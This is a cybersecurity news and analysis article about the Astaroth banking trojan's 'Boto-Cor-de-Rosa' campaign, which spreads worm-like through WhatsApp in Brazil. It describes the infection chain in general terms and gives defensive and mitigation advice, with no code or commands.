The Pink Dolphin’s Digital Hunt: WhatsApp’s Role in Reviving a Notorious Banking Trojan

In the ever-evolving world of cybersecurity threats, a familiar foe has resurfaced with a clever twist, leveraging one of the world’s most popular messaging apps to target users in Brazil. The Astaroth banking trojan, long known for its stealthy tactics in stealing financial data, is now propagating through WhatsApp in a worm-like fashion. This campaign, dubbed “Boto-Cor-de-Rosa” or “Pink Dolphin,” marks a significant escalation in how malware authors exploit social platforms for automated spread. Drawing from recent reports, this development underscores the growing intersection between everyday communication tools and sophisticated cybercrime.

The infection chain begins innocuously: a WhatsApp message arrives containing a ZIP file with a seemingly harmless name. Once opened on a Windows system, the file unleashes a Visual Basic script that downloads the core Astaroth payload. But what sets this variant apart is its integration of a Python-based module designed specifically for WhatsApp Web. This component automates the theft of the victim’s contact list and sends out malicious messages to those contacts, creating a self-perpetuating cycle that mimics a worm’s behavior.

Cybersecurity researchers have been quick to dissect this threat. According to a detailed analysis by The Hacker News, the malware focuses on Brazilian users, exploiting the region’s heavy reliance on WhatsApp for both personal and business communications. The ZIP files often masquerade as legitimate documents, such as invoices or updates, luring victims into extracting and running the embedded script.

Unpacking the Mechanics of Infection

Delving deeper into the technical underpinnings, the Astaroth trojan employs heavy obfuscation to evade detection. The initial Visual Basic script fetches additional components from remote servers, including the Python worm module. This module interfaces with WhatsApp Web via browser automation, scanning for open sessions and hijacking them to extract contacts. It’s a testament to the malware’s adaptability, building on Astaroth’s history of using living-off-the-land binaries (LOLBins) to blend into normal system processes.

Once installed, the trojan targets banking credentials, keystrokes, and clipboard data, with a particular emphasis on Brazilian financial institutions. Persistence is achieved through registry modifications and scheduled tasks, ensuring the malware survives reboots. The worm aspect amplifies its reach: by auto-messaging contacts, it turns infected devices into unwitting distributors, potentially infecting entire networks of friends, family, and colleagues.

Insights from SiliconANGLE highlight how this campaign differs from prior Astaroth iterations, which relied on phishing emails or malicious websites. The shift to WhatsApp introduces a social engineering layer that’s harder to mitigate, as messages appear to come from trusted sources. Acronis International GmbH, the firm that first reported on “Boto-Cor-de-Rosa,” notes the campaign’s use of randomly generated filenames to avoid pattern-based detection.

Historical Context and Evolution of Astaroth

Astaroth isn’t new to the scene; it first gained notoriety around 2018 for its fileless techniques, loading directly into memory to avoid leaving traces on disk. Over the years, it has targeted Latin American users, particularly in Brazil, where digital banking is widespread. Microsoft Threat Intelligence documented significant updates in 2020, emphasizing its evasion tactics using system tools like bitsadmin and regsvr32.

The current resurgence builds on this foundation but innovates with mobile-desktop integration. Posts on X (formerly Twitter) from cybersecurity experts reflect growing alarm; for instance, accounts like The Hacker News have shared alerts about the worm’s auto-sending capabilities, urging users to verify suspicious messages. This echoes earlier Android-based WhatsApp worms analyzed by researchers like Lukas Stefanko, who in 2019 and 2021 detailed malware that replied to messages with malicious links.

Sophos, in a November 2025 blog post via Sophos, described a similar campaign involving credential theft and session hijacking. That earlier variant spread worm-like through WhatsApp, deploying multiple payloads for persistence. The “Boto-Cor-de-Rosa” evolution adds the Python worm, making it more autonomous and harder to trace back to command-and-control servers.

The Brazilian Focus and Broader Implications

Brazil’s digital ecosystem makes it a prime target. With over 100 million WhatsApp users, the app serves as a lifeline for communication, often blending personal chats with business dealings. Hackread reports via Hackread that the trojan steals banking credentials specifically tailored to local banks, potentially leading to widespread financial fraud. The malware’s focus on Windows systems aligns with Brazil’s desktop-heavy banking habits, where users access web portals rather than mobile apps.

This isn’t isolated; X posts from sources like Cointelegraph in late 2025 warned of similar worms stealing crypto wallet access, indicating a trend toward multifunctional stealers. In Brazil, where economic instability can heighten cybercrime incentives, such threats exploit trust in messaging apps. Security Affairs elaborates in its coverage at Security Affairs, noting how the worm automatically forwards messages, creating exponential spread.

The campaign’s naming as “Boto-Cor-de-Rosa” draws from Amazonian folklore, symbolizing the pink river dolphin’s mythical allure—much like how the malware lures victims with benign appearances. Researchers at OffSeq.com’s Threat Radar, through OffSeq.com, provide real-time updates on infection vectors, emphasizing the need for behavioral analysis tools to detect anomalies in WhatsApp usage.

Detection Challenges and Mitigation Strategies

Detecting Astaroth in this form poses unique hurdles. Traditional antivirus may miss the obfuscated scripts, and the worm’s reliance on legitimate WhatsApp sessions complicates endpoint monitoring. Industry insiders recommend multi-layered defenses: enabling two-factor authentication on banking apps, scrutinizing ZIP attachments, and using browser extensions to block unauthorized automation.

From a corporate perspective, enterprises in Brazil should implement strict policies on WhatsApp usage for work, perhaps routing communications through secure alternatives. Acronis suggests in its report that updating WhatsApp and Windows regularly can patch vulnerabilities exploited by the trojan. Moreover, user education is key—training to recognize phishing via unexpected files, even from known contacts.

X sentiment, as seen in posts from figures like Tola Joseph Fadugbagbe, underscores the annoyance and harm of such worms, with calls for vigilance against data theft targeting crypto and banking. CyberMaterial’s analysis at CyberMaterial confirms the Python worm’s role in automatic propagation through contact lists, a tactic that could inspire copycat campaigns globally.

Global Ramifications and Future Threats

While currently confined to Brazil, the techniques in “Boto-Cor-de-Rosa” could migrate elsewhere. WhatsApp’s global user base—over 2 billion—offers a vast attack surface. If adapted for other regions, it might target different financial systems, from European banks to Asian mobile wallets. TechJuice reports via TechJuice that official sources confirm the malware’s spread via compromised accounts, highlighting the need for platform-level interventions by Meta.

SempreUpdate, in its Portuguese coverage at SempreUpdate, advises Brazilian users on protection: avoid opening unknown attachments, log out of WhatsApp Web sessions, and monitor for unusual activity. This aligns with broader industry advice to integrate threat intelligence feeds for proactive defense.

The resurgence of Astaroth via WhatsApp signals a shift toward socially engineered, automated malware. For insiders, it prompts a reevaluation of how messaging apps fit into security frameworks. As threats like this evolve, collaboration between platforms, researchers, and users becomes essential to stem the tide.

Emerging Defenses and Industry Response

Antivirus vendors are racing to update signatures, but behavioral detection remains crucial. Tools that monitor for unusual scripting or browser interactions can flag the Python module early. Enterprises might consider zero-trust models, treating all incoming messages as potential threats.

Looking ahead, Meta could enhance WhatsApp’s security with AI-driven anomaly detection, flagging mass messaging from single accounts. Regulatory bodies in Brazil, already vigilant on data privacy, may push for stricter app store policies on related malware droppers.

In the end, “Boto-Cor-de-Rosa” exemplifies how old threats reinvent themselves, blending technical prowess with social manipulation. Staying ahead requires not just technology, but a cultural shift toward skepticism in digital interactions.